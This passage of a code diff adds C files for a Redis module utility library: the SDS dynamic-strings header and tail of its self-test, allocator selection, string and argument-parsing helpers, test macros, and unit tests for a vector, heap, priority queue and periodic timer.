+            for (i = 0; i < 10; i++) {
+                int oldlen = sdslen(x);
+                x = sdsMakeRoomFor(x,step);
+                int type = x[-1]&SDS_TYPE_MASK;
+
+                test_cond("sdsMakeRoomFor() len", sdslen(x) == oldlen);
+                if (type != SDS_TYPE_5) {
+                    test_cond("sdsMakeRoomFor() free", sdsavail(x) >= step);
+                    oldfree = sdsavail(x);
+                }
+                p = x+oldlen;
+                for (j = 0; j < step; j++) {
+                    p[j] = 'A'+j;
+                }
+                sdsIncrLen(x,step);
+            }
+            test_cond("sdsMakeRoomFor() content",
+                memcmp("0ABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJ",x,101) == 0);
+            test_cond("sdsMakeRoomFor() final length",sdslen(x)==101);
+
+            sdsfree(x);
+        }
+    }
+    test_report()
+    return 0;
+}
+#endif
+
+#ifdef SDS_TEST_MAIN
+int main(void) {
+    return sdsTest();
+}
+#endif
@@ -0,0 +1,273 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Oran Agra
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#ifndef __SDS_H
+#define __SDS_H
+
+#define SDS_MAX_PREALLOC (1024*1024)
+
+#include <sys/types.h>
+#include <stdarg.h>
+#include <stdint.h>
+
+typedef char *sds;
+
+/* Note: sdshdr5 is never used, we just access the flags byte directly.
+ * However is here to document the layout of type 5 SDS strings. */
+struct __attribute__ ((__packed__)) sdshdr5 {
+    unsigned char flags; /* 3 lsb of type, and 5 msb of string length */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr8 {
+    uint8_t len; /* used */
+    uint8_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr16 {
+    uint16_t len; /* used */
+    uint16_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr32 {
+    uint32_t len; /* used */
+    uint32_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr64 {
+    uint64_t len; /* used */
+    uint64_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+
+#define SDS_TYPE_5  0
+#define SDS_TYPE_8  1
+#define SDS_TYPE_16 2
+#define SDS_TYPE_32 3
+#define SDS_TYPE_64 4
+#define SDS_TYPE_MASK 7
+#define SDS_TYPE_BITS 3
+#define SDS_HDR_VAR(T,s) struct sdshdr##T *sh = (void*)((s)-(sizeof(struct sdshdr##T)));
+#define SDS_HDR(T,s) ((struct sdshdr##T *)((s)-(sizeof(struct sdshdr##T))))
+#define SDS_TYPE_5_LEN(f) ((f)>>SDS_TYPE_BITS)
+
+static inline size_t sdslen(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return SDS_TYPE_5_LEN(flags);
+        case SDS_TYPE_8:
+            return SDS_HDR(8,s)->len;
+        case SDS_TYPE_16:
+            return SDS_HDR(16,s)->len;
+        case SDS_TYPE_32:
+            return SDS_HDR(32,s)->len;
+        case SDS_TYPE_64:
+            return SDS_HDR(64,s)->len;
+    }
+    return 0;
+}
+
+static inline size_t sdsavail(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5: {
+            return 0;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            return sh->alloc - sh->len;
+        }
+    }
+    return 0;
+}
+
+static inline void sdssetlen(sds s, size_t newlen) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            {
+                unsigned char *fp = ((unsigned char*)s)-1;
+                *fp = SDS_TYPE_5 | (newlen << SDS_TYPE_BITS);
+            }
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->len = newlen;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->len = newlen;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->len = newlen;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->len = newlen;
+            break;
+    }
+}
+
+static inline void sdsinclen(sds s, size_t inc) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            {
+                unsigned char *fp = ((unsigned char*)s)-1;
+                unsigned char newlen = SDS_TYPE_5_LEN(flags)+inc;
+                *fp = SDS_TYPE_5 | (newlen << SDS_TYPE_BITS);
+            }
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->len += inc;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->len += inc;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->len += inc;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->len += inc;
+            break;
+    }
+}
+
+/* sdsalloc() = sdsavail() + sdslen() */
+static inline size_t sdsalloc(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return SDS_TYPE_5_LEN(flags);
+        case SDS_TYPE_8:
+            return SDS_HDR(8,s)->alloc;
+        case SDS_TYPE_16:
+            return SDS_HDR(16,s)->alloc;
+        case SDS_TYPE_32:
+            return SDS_HDR(32,s)->alloc;
+        case SDS_TYPE_64:
+            return SDS_HDR(64,s)->alloc;
+    }
+    return 0;
+}
+
+static inline void sdssetalloc(sds s, size_t newlen) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            /* Nothing to do, this type has no total allocation info. */
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->alloc = newlen;
+            break;
+    }
+}
+
+sds sdsnewlen(const void *init, size_t initlen);
+sds sdsnew(const char *init);
+sds sdsempty(void);
+sds sdsdup(const sds s);
+void sdsfree(sds s);
+sds sdsgrowzero(sds s, size_t len);
+sds sdscatlen(sds s, const void *t, size_t len);
+sds sdscat(sds s, const char *t);
+sds sdscatsds(sds s, const sds t);
+sds sdscpylen(sds s, const char *t, size_t len);
+sds sdscpy(sds s, const char *t);
+
+sds sdscatvprintf(sds s, const char *fmt, va_list ap);
+#ifdef __GNUC__
+sds sdscatprintf(sds s, const char *fmt, ...)
+    __attribute__((format(printf, 2, 3)));
+#else
+sds sdscatprintf(sds s, const char *fmt, ...);
+#endif
+
+sds sdscatfmt(sds s, char const *fmt, ...);
+sds sdstrim(sds s, const char *cset);
+void sdsrange(sds s, int start, int end);
+void sdsupdatelen(sds s);
+void sdsclear(sds s);
+int sdscmp(const sds s1, const sds s2);
+sds *sdssplitlen(const char *s, int len, const char *sep, int seplen, int *count);
+void sdsfreesplitres(sds *tokens, int count);
+void sdstolower(sds s);
+void sdstoupper(sds s);
+sds sdsfromlonglong(long long value);
+sds sdscatrepr(sds s, const char *p, size_t len);
+sds *sdssplitargs(const char *line, int *argc);
+sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen);
+sds sdsjoin(char **argv, int argc, char *sep);
+sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen);
+
+/* Low level functions exposed to the user API */
+sds sdsMakeRoomFor(sds s, size_t addlen);
+void sdsIncrLen(sds s, int incr);
+sds sdsRemoveFreeSpace(sds s);
+size_t sdsAllocSize(sds s);
+void *sdsAllocPtr(sds s);
+
+/* Export the allocator used by SDS to the program using SDS.
+ * Sometimes the program SDS is linked to, may use a different set of
+ * allocators, but may want to allocate or free things that SDS will
+ * respectively free or allocate. */
+void *sds_malloc(size_t size);
+void *sds_realloc(void *ptr, size_t size);
+void sds_free(void *ptr);
+
+#ifdef REDIS_TEST
+int sdsTest(int argc, char *argv[]);
+#endif
+
+#endif
@@ -0,0 +1,47 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+/* SDS allocator selection.
+ *
+ * This file is used in order to change the SDS allocator at compile time.
+ * Just define the following defines to what you want to use. Also add
+ * the include of your alternate allocator if needed (not needed in order
+ * to use the default libc allocator). */
+
+#if defined(__MACH__)
+#include <stdlib.h>
+#else
+#include <malloc.h>
+#endif
+//#include "zmalloc.h"
+#define s_malloc malloc
+#define s_realloc realloc
+#define s_free free
@@ -0,0 +1,81 @@
+#include <string.h>
+#include <sys/param.h>
+#include <ctype.h>
+#include "strings.h"
+#include "alloc.h"
+
+#include "sds.h"
+
+// RedisModuleString *RMUtil_CreateFormattedString(RedisModuleCtx *ctx, const char *fmt, ...) {
+//     sds s = sdsempty();
+
+//     va_list ap;
+//     va_start(ap, fmt);
+//     s = sdscatvprintf(s, fmt, ap);
+//     va_end(ap);
+
+//     RedisModuleString *ret = RedisModule_CreateString(ctx, (const char *)s, sdslen(s));
+//     sdsfree(s);
+//     return ret;
+// }
+
+int RMUtil_StringEquals(RedisModuleString *s1, RedisModuleString *s2) {
+
+  const char *c1, *c2;
+  size_t l1, l2;
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  c2 = RedisModule_StringPtrLen(s2, &l2);
+  if (l1 != l2) return 0;
+
+  return strncmp(c1, c2, l1) == 0;
+}
+
+int RMUtil_StringEqualsC(RedisModuleString *s1, const char *s2) {
+
+  const char *c1;
+  size_t l1, l2 = strlen(s2);
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  if (l1 != l2) return 0;
+
+  return strncmp(c1, s2, l1) == 0;
+}
+int RMUtil_StringEqualsCaseC(RedisModuleString *s1, const char *s2) {
+
+  const char *c1;
+  size_t l1, l2 = strlen(s2);
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  if (l1 != l2) return 0;
+
+  return strncasecmp(c1, s2, l1) == 0;
+}
+
+void RMUtil_StringToLower(RedisModuleString *s) {
+
+  size_t l;
+  char *c = (char *)RedisModule_StringPtrLen(s, &l);
+  size_t i;
+  for (i = 0; i < l; i++) {
+    *c = tolower(*c);
+    ++c;
+  }
+}
+
+void RMUtil_StringToUpper(RedisModuleString *s) {
+  size_t l;
+  char *c = (char *)RedisModule_StringPtrLen(s, &l);
+  size_t i;
+  for (i = 0; i < l; i++) {
+    *c = toupper(*c);
+    ++c;
+  }
+}
+
+void RMUtil_StringConvert(RedisModuleString **rs, const char **ss, size_t n, int options) {
+  for (size_t ii = 0; ii < n; ++ii) {
+    const char *p = RedisModule_StringPtrLen(rs[ii], NULL);
+    if (options & RMUTIL_STRINGCONVERT_COPY) {
+      p = strdup(p);
+    }
+    ss[ii] = p;
+  }
+}
@@ -0,0 +1,38 @@
+#ifndef __RMUTIL_STRINGS_H__
+#define __RMUTIL_STRINGS_H__
+
+#include <redismodule.h>
+
+/*
+* Create a new RedisModuleString object from a printf-style format and arguments.
+* Note that RedisModuleString objects CANNOT be used as formatting arguments.
+*/
+// DEPRECATED since it was added to the RedisModule API. Replaced with a macro below
+// RedisModuleString *RMUtil_CreateFormattedString(RedisModuleCtx *ctx, const char *fmt, ...);
+#define RMUtil_CreateFormattedString RedisModule_CreateStringPrintf
+
+/* Return 1 if the two strings are equal. Case *sensitive* */
+int RMUtil_StringEquals(RedisModuleString *s1, RedisModuleString *s2);
+
+/* Return 1 if the string is equal to a C NULL terminated string. Case *sensitive* */
+int RMUtil_StringEqualsC(RedisModuleString *s1, const char *s2);
+
+/* Return 1 if the string is equal to a C NULL terminated string. Case *insensitive* */
+int RMUtil_StringEqualsCaseC(RedisModuleString *s1, const char *s2);
+
+/* Converts a redis string to lowercase in place without reallocating anything */
+void RMUtil_StringToLower(RedisModuleString *s);
+
+/* Converts a redis string to uppercase in place without reallocating anything */
+void RMUtil_StringToUpper(RedisModuleString *s);
+
+// If set, copy the strings using strdup rather than simply storing pointers.
+#define RMUTIL_STRINGCONVERT_COPY 1
+
+/**
+ * Convert one or more RedisModuleString objects into `const char*`.
+ * Both rs and ss are arrays, and should be of <n> length.
+ * Options may be 0 or `RMUTIL_STRINGCONVERT_COPY`
+ */
+void RMUtil_StringConvert(RedisModuleString **rs, const char **ss, size_t n, int options);
+#endif
@@ -0,0 +1,69 @@
+#ifndef __TESTUTIL_H__
+#define __TESTUTIL_H__
+
+#include <assert.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+static int numTests = 0;
+static int numAsserts = 0;
+
+#define TESTFUNC(f)                        \
+  printf("  Testing %s\t\t", __STRING(f)); \
+  numTests++;                              \
+  fflush(stdout);                          \
+  if (f()) {                               \
+    printf(" %s FAILED!\n", __STRING(f));  \
+    exit(1);                               \
+  } else                                   \
+    printf("[PASS]\n");
+
+#define ASSERTM(expr, ...)                                                                 \
+  if (!(expr)) {                                                                           \
+    fprintf(stderr, "%s:%d: Assertion '%s' Failed: " __VA_ARGS__ "\n", __FILE__, __LINE__, \
+            __STRING(expr));                                                               \
+    return -1;                                                                             \
+  }                                                                                        \
+  numAsserts++;
+
+#define ASSERT(expr)                                                                      \
+  if (!(expr)) {                                                                          \
+    fprintf(stderr, "%s:%d Assertion '%s' Failed\n", __FILE__, __LINE__, __STRING(expr)); \
+    return -1;                                                                            \
+  }                                                                                       \
+  numAsserts++;
+
+#define ASSERT_STRING_EQ(s1, s2) ASSERT(!strcmp(s1, s2));
+
+#define ASSERT_EQUAL(x, y, ...)                                           \
+  if (x != y) {                                                           \
+    fprintf(stderr, "%s:%d: ", __FILE__, __LINE__);                       \
+    fprintf(stderr, "%g != %g: " __VA_ARGS__ "\n", (double)x, (double)y); \
+    return -1;                                                            \
+  }                                                                       \
+  numAsserts++;
+
+#define FAIL(fmt, ...)                                                            \
+  {                                                                               \
+    fprintf(stderr, "%s:%d: FAIL: " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__); \
+    return -1;                                                                    \
+  }
+
+#define RETURN_TEST_SUCCESS return 0;
+#define TEST_CASE(x, block) \
+  int x {                   \
+    block;                  \
+    return 0                \
+  }
+
+#define PRINT_TEST_SUMMARY printf("\nTotal: %d tests and %d assertions OK\n", numTests, numAsserts);
+
+#define TEST_MAIN(body)                         \
+  int main(int argc, char **argv) {             \
+    printf("Starting Test '%s'...\n", argv[0]); \
+    body;                                       \
+    PRINT_TEST_SUMMARY;                         \
+    printf("\n--------------------\n\n");       \
+    return 0;                                   \
+  }
+#endif
@@ -0,0 +1,38 @@
+#include <stdio.h>
+#include "heap.h"
+#include "assert.h"
+
+int cmp(void *a, void *b) {
+    int *__a = (int *) a;
+    int *__b = (int *) b;
+    return *__a - *__b;
+}
+
+int main(int argc, char **argv) {
+    int myints[] = {10, 20, 30, 5, 15};
+    Vector *v = NewVector(int, 5);
+    for (int i = 0; i < 5; i++) {
+        Vector_Push(v, myints[i]);
+    }
+
+    Make_Heap(v, 0, v->top, cmp);
+
+    int n;
+    Vector_Get(v, 0, &n);
+    assert(30 == n);
+
+    Heap_Pop(v, 0, v->top, cmp);
+    v->top = 4;
+    Vector_Get(v, 0, &n);
+    assert(20 == n);
+
+    Vector_Push(v, 99);
+    Heap_Push(v, 0, v->top, cmp);
+    Vector_Get(v, 0, &n);
+    assert(99 == n);
+
+    Vector_Free(v);
+    printf("PASS!\n");
+    return 0;
+}
+
@@ -0,0 +1,26 @@
+#include <stdio.h>
+#include <redismodule.h>
+#include <unistd.h>
+#include "periodic.h"
+#include "assert.h"
+#include "test.h"
+
+void timerCb(RedisModuleCtx *ctx, void *p) {
+  int *x = p;
+  (*x)++;
+}
+
+int testPeriodic() {
+  int x = 0;
+  struct RMUtilTimer *tm = RMUtil_NewPeriodicTimer(
+      timerCb, NULL, &x, (struct timespec){.tv_sec = 0, .tv_nsec = 10000000});
+
+  sleep(1);
+
+  ASSERT_EQUAL(0, RMUtilTimer_Terminate(tm));
+  ASSERT(x > 0);
+  ASSERT(x <= 100);
+  return 0;
+}
+
+TEST_MAIN({ TESTFUNC(testPeriodic); });
@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include "assert.h"
+#include "priority_queue.h"
+
+int cmp(void* i1, void* i2) {
+    int *__i1 = (int*) i1;
+    int *__i2 = (int*) i2;
+    return *__i1 - *__i2;
+}
+
+int main(int argc, char **argv) {
+    PriorityQueue *pq = NewPriorityQueue(int, 10, cmp);
+    assert(0 == Priority_Queue_Size(pq));
+
+    for (int i = 0; i < 5; i++) {
+        Priority_Queue_Push(pq, i);
+    }
+    assert(5 == Priority_Queue_Size(pq));
+
+    Priority_Queue_Pop(pq);
+    assert(4 == Priority_Queue_Size(pq));
+
+    Priority_Queue_Push(pq, 10);
+    Priority_Queue_Push(pq, 20);
+    Priority_Queue_Push(pq, 15);
+    int n;
+    Priority_Queue_Top(pq, &n);
+    assert(20 == n);
+
+    Priority_Queue_Pop(pq);
+    Priority_Queue_Top(pq, &n);
+    assert(15 == n);
+
+    Priority_Queue_Free(pq);
+    printf("PASS!\n");
+    return 0;
+}
@@ -0,0 +1,67 @@
+#ifndef __TEST_UTIL_H__
+#define __TEST_UTIL_H__
+
+#include "util.h"
+#include <stdarg.h>
+#include <stdlib.h>
+#include <string.h>
+
+
+#define RMUtil_Test(f) \
+                if (argc < 2 || RMUtil_ArgExists(__STRING(f), argv, argc, 1)) { \
+                    int rc = f(ctx); \
+                    if (rc != REDISMODULE_OK) { \
+                        RedisModule_ReplyWithError(ctx, "Test " __STRING(f) " FAILED"); \
+                        return REDISMODULE_ERR;\
+                    }\
+                }
+           
+                
+#define RMUtil_Assert(expr) if (!(expr)) { fprintf (stderr, "Assertion '%s' Failed\n", __STRING(expr)); return REDISMODULE_ERR; }
+
+#define RMUtil_AssertReplyEquals(rep, cstr) RMUtil_Assert( \
+            RMUtil_StringEquals(RedisModule_CreateStringFromCallReply(rep), RedisModule_CreateString(ctx, cstr, strlen(cstr))) \
+            )
+#            
+
+/**
+* Create an arg list to pass to a redis command handler manually, based on the format in fmt.
+* The accepted format specifiers are:
+*   c - for null terminated c strings
+*   s - for RedisModuleString* objects
+*   l - for longs
+*
+*  Example:  RMUtil_MakeArgs(ctx, &argc, "clc", "hello", 1337, "world");
+*
+*  Returns an array of RedisModuleString pointers. The size of the array is store in argcp
+*/
+RedisModuleString **RMUtil_MakeArgs(RedisModuleCtx *ctx, int *argcp, const char *fmt, ...) {
+    
+    va_list ap;
+    va_start(ap, fmt);
+    RedisModuleString **argv = calloc(strlen(fmt), sizeof(RedisModuleString*));
+    int argc = 0;
+    const char *p = fmt;
+    while(*p) {
+        if (*p == 'c') {
+            char *cstr = va_arg(ap,char*);
+            argv[argc++] = RedisModule_CreateString(ctx, cstr, strlen(cstr));
+        } else if (*p == 's') {
+            argv[argc++] = va_arg(ap,void*);;
+        } else if (*p == 'l') {
+            long ll = va_arg(ap,long long);
+            argv[argc++] = RedisModule_CreateStringFromLongLong(ctx, ll);
+        } else {
+            goto fmterr;
+        }
+        p++;
+    }
+    *argcp = argc;
+    
+    return argv;
+fmterr:
+    free(argv);
+    return NULL;
+}
+
+#endif
@@ -0,0 +1,58 @@
+#include "vector.h"
+#include <stdio.h>
+#include "test.h"
+
+int testVector() {
+
+  Vector *v = NewVector(int, 1);
+  ASSERT(v != NULL);
+  // Vector_Put(v, 0, 1);
+  // Vector_Put(v, 1, 3);
+  for (int i = 0; i < 10; i++) {
+    Vector_Push(v, i);
+  }
+  ASSERT_EQUAL(10, Vector_Size(v));
+  ASSERT_EQUAL(16, Vector_Cap(v));
+
+  for (int i = 0; i < Vector_Size(v); i++) {
+    int n;
+    int rc = Vector_Get(v, i, &n);
+    ASSERT_EQUAL(1, rc);
+    // printf("%d %d\n", rc, n);
+
+    ASSERT_EQUAL(n, i);
+  }
+
+  Vector_Free(v);
+
+  v = NewVector(char *, 0);
+  int N = 4;
+  char *strings[4] = {"hello", "world", "foo", "bar"};
+
+  for (int i = 0; i < N; i++) {
+    Vector_Push(v, strings[i]);
+  }
+  ASSERT_EQUAL(N, Vector_Size(v));
+  ASSERT(Vector_Cap(v) >= N);
+
+  for (int i = 0; i < Vector_Size(v); i++) {
+    char *x;
+    int rc = Vector_Get(v, i, &x);
+    ASSERT_EQUAL(1, rc);
+    ASSERT_STRING_EQ(x, strings[i]);
+  }
+
+  int rc = Vector_Get(v, 100, NULL);
+  ASSERT_EQUAL(0, rc);
+
+  Vector_Free(v);
+
+  return 0;
+  // Vector_Push(v, "hello");
+  // Vector_Push(v, "world");
+  // char *x = NULL;
+  // int rc = Vector_Getx(v, 0, &x);
+  // printf("rc: %d got %s\n", rc, x);
+}
+
+TEST_MAIN({ TESTFUNC(testVector); });
@@ -0,0 +1,299 @@
+#include <stdlib.h>
+#include <errno.h>
+#include <math.h>
+#include <ctype.h>
+#include <sys/time.h>
+#include <stdarg.h>
+#include <limits.h>
+#include <string.h>
+#define REDISMODULE_EXPERIMENTAL_API
+#include <redismodule.h>
+#include "util.h"
+
+/**
+Check if an argument exists in an argument list (argv,argc), starting at offset.
+@return 0 if it doesn't exist, otherwise the offset it exists in
+*/
+int RMUtil_ArgExists(const char *arg, RedisModuleString **argv, int argc, int offset) {
+
+  size_t larg = strlen(arg);
+  for (; offset < argc; offset++) {
+    size_t l;
+    const char *carg = RedisModule_StringPtrLen(argv[offset], &l);
+    if (l != larg) continue;
+    if (carg != NULL && strncasecmp(carg, arg, larg) == 0) {
+      return offset;
+    }
+  }
+  return 0;
+}
+
+/**
+Check if an argument exists in an argument list (argv,argc)
+@return -1 if it doesn't exist, otherwise the offset it exists in
+*/
+int RMUtil_ArgIndex(const char *arg, RedisModuleString **argv, int argc) {
+
+  size_t larg = strlen(arg);
+  for (int offset = 0; offset < argc; offset++) {
+    size_t l;
+    const char *carg = RedisModule_StringPtrLen(argv[offset], &l);
+    if (l != larg) continue;
+    if (carg != NULL && strncasecmp(carg, arg, larg) == 0) {
+      return offset;
+    }
+  }
+  return -1;
+}
+
+RMUtilInfo *RMUtil_GetRedisInfo(RedisModuleCtx *ctx) {
+
+  RedisModuleCallReply *r = RedisModule_Call(ctx, "INFO", "c", "all");
+  if (r == NULL || RedisModule_CallReplyType(r) == REDISMODULE_REPLY_ERROR) {
+    return NULL;
+  }
+
+  int cap = 100;  // rough estimate of info lines
+  RMUtilInfo *info = malloc(sizeof(RMUtilInfo));
+  info->entries = calloc(cap, sizeof(RMUtilInfoEntry));
+
+  int i = 0;
+  size_t sz;
+  char *text = (char *)RedisModule_CallReplyStringPtr(r, &sz);
+
+  char *line = text;
+  while (line && line < text + sz) {
+    char *line = strsep(&text, "\r\n");
+    if (line == NULL) break;
+
+    if (!(*line >= 'a' && *line <= 'z')) {  // skip non entry lines
+      continue;
+    }
+
+    char *key = strsep(&line, ":");
+    info->entries[i].key = strdup(key);
+    info->entries[i].val = strdup(line);
+    i++;
+    if (i >= cap) {
+      cap *= 2;
+      info->entries = realloc(info->entries, cap * sizeof(RMUtilInfoEntry));
+    }
+  }
+  info->numEntries = i;
+  RedisModule_FreeCallReply(r);
+  return info;
+}
+void RMUtilRedisInfo_Free(RMUtilInfo *info) {
+  for (int i = 0; i < info->numEntries; i++) {
+    free(info->entries[i].key);
+    free(info->entries[i].val);
+  }
+  free(info->entries);
+  free(info);
+}
+
+int RMUtilInfo_GetInt(RMUtilInfo *info, const char *key, long long *val) {
+
+  const char *p = NULL;
+  if (!RMUtilInfo_GetString(info, key, &p)) {
+    return 0;
+  }
+
+  *val = strtoll(p, NULL, 10);
+  if ((errno == ERANGE && (*val == LONG_MAX || *val == LONG_MIN)) || (errno != 0 && *val == 0)) {
+    *val = -1;
+    return 0;
+  }
+
+  return 1;
+}
+
+int RMUtilInfo_GetString(RMUtilInfo *info, const char *key, const char **str) {
+  int i;
+  for (i = 0; i < info->numEntries; i++) {
+    if (!strcmp(key, info->entries[i].key)) {
+      *str = info->entries[i].val;
+      return 1;
+    }
+  }
+  return 0;
+}
+
+int RMUtilInfo_GetDouble(RMUtilInfo *info, const char *key, double *d) {
+  const char *p = NULL;
+  if (!RMUtilInfo_GetString(info, key, &p)) {
+    printf("not found %s\n", key);
+    return 0;
+  }
+
+  *d = strtod(p, NULL);
+  if ((errno == ERANGE && (*d == HUGE_VAL || *d == -HUGE_VAL)) || (errno != 0 && *d == 0)) {
+    return 0;
+  }
+
+  return 1;
+}
+
+/*
+c -- pointer to a Null terminated C string pointer.
+b -- pointer to a C buffer, followed by pointer to a size_t for its length
+s -- pointer to a RedisModuleString
+l -- pointer to Long long integer.
+d -- pointer to a Double
+* -- do not parse this argument at all
+*/
+int RMUtil_ParseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, ...) {
+  va_list ap;
+  va_start(ap, fmt);
+  int rc = rmutil_vparseArgs(argv, argc, offset, fmt, ap);
+  va_end(ap);
+  return rc;
+}
+
+// Internal function that parses arguments based on the format described above
+int rmutil_vparseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, va_list ap) {
+
+  int i = offset;
+  char *c = (char *)fmt;
+  while (*c && i < argc) {
+
+    // read c string
+    if (*c == 'c') {
+      char **p = va_arg(ap, char **);
+      *p = (char *)RedisModule_StringPtrLen(argv[i], NULL);
+    } else if (*c == 'b') {
+      char **p = va_arg(ap, char **);
+      size_t *len = va_arg(ap, size_t *);
+      *p = (char *)RedisModule_StringPtrLen(argv[i], len);
+    } else if (*c == 's') {  // read redis string
+
+      RedisModuleString **s = va_arg(ap, void *);
+      *s = argv[i];
+
+    } else if (*c == 'l') {  // read long
+      long long *l = va_arg(ap, long long *);
+
+      if (RedisModule_StringToLongLong(argv[i], l) != REDISMODULE_OK) {
+        return REDISMODULE_ERR;
+      }
